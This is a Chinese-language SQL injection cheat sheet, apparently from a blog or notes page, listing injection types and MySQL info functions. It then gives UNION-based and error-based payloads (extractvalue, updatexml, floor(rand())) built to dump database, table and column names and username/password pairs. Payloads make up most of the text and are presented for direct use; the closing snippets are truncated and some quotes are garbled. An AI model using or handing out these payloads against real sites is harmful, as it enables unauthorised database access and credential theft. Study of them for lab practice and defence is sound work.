sql的注入型別有以下5種:
boolean-based blind sql injection(布林型注入)
error-based sql injection(報錯型注入)
union query sql injection(可聯合查詢注入)
stacked queries sql injection(可多語句查詢注入)
time-based blind sql injection(基於時間延遲注入)
user() 當前使用者名稱
database() 當前資料庫名
version() mysql 版本
@@basedir可以獲取mysql的安裝路徑
@@datadir用來獲取mysql的資料路徑。
聯合查詢
union select concat(『~『,user(),database(),version())from users 鏈結函式將內容在乙個顯錯位一起爆出來
union select group_concat(schema_name) from information_schema.schemata 爆全部的庫名
union select table_name from information_schema.tables where table_schema=0x7365637572697479 爆表名
union select group_concat(table_name)from information_schema.tables where table_schema=database() 爆表名
union select column_name from information_schema.columns where table_name=0x7573657273 爆列名
union select concat_ws(『~『,id,username,password) from users 爆內容
union select concat_ws(char(32,126,32),id,username,password) from users 爆內容
union select concat_ws(char(32,126,32),`id`,`username`,`password`) from users 爆內容
union select 1,group_concat(username,0x3a,password),3 from users 爆內容
報錯查詢
and 1=extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) 爆全部表
或者and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+ 爆全部表
and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name=0x7573657273))) 爆全部列
and extractvalue(1,concat(0x7e,(select group_concat(id,username,password)from users ))) 爆全部內容
and 1=extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in (『dumb『,『i-kill-you『))))爆全部內容 用not in
mysql報錯主要分為三種方式
報錯型注入常用語句
and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)and 1=updatexml(1,concat(0x7e,(select database())),1)and 1=extractvalue(1,concat(0x7e,(select database())))
新型mysql報錯注入
新型mysql報錯注入,這種報錯注入主要是基於mysql中無符號int資料型別的溢位 1.查詢資料庫版本 select 2 if select 8 from select version s 18446744073709551610,18446744073709551610 select 1e308...
mysql報錯型注入
mysql bug 8652 group by 對一些rand 函式進行操作時會返回duplicate key 錯誤,而這個錯誤將會披露關鍵資訊 duplicate entry for key1 這裡的 正是使用者輸入的希望查詢的內容 而該bug產生的主要原因就是 在rand 和group by同時...
MYSQL注入語句
union select 1,1,1,1,1 order by 13 union select 1,2,3,4,11,12,13 from admin union select 1,version 3,13 from admin union select 1,username,3,13 from a...